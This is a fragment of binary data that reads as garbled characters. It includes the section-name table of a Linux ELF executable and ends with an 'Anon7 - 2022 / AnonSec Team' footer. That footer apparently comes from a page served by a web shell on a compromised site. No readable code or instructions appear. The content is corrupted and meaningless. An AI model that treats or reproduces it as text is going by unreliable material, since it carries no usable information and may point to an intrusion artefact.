et�r��GY!�����.����[�%���m?��^��O��_�v%е(��)d�Ej� &%5�"�OX�p\��Z19Fg��(��p#�'ړG�
b@9�v9�JUՀX~�>7����K�bĚ��۝��E,>��E�B�&�����d�`l���7X
BPIl%|���D���Vd(?�"SM�	}�����\�4��5p�
������9bX����g�vj�Y�и�v�m�!���w�Y�K��״B)|6B��>B��f�@�0�#�"X��U�ζdžA)�Q�̉�k9�Mk�蒑t�9��%�z��s_�:8�:��R��Y6M_?�������Sw�	�#I���g�YZ.shstrtab.interp.note.ABI-tag.note.gnu.build-id.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.text.fini.rodata.eh_frame_hdr.eh_frame.gcc_except_table.init_array.fini_array.jcr.dynamic.got.got.plt.data.bss.gnu_debuglink.gnu_debugdata8@8T@T !t@t$4���o�@�@>�@��F�@�AN���o@~[���o�@��j0
@0
0tB`
@`
@~�@�y�@���P@P�?�4V@4V	�@V@@V���n@�n���o@�o���t@�t���}`�}��}`�}��}`�}��}`�}��`���`���؁`؁��`�� �����

Anon7 - 2022
AnonSec Team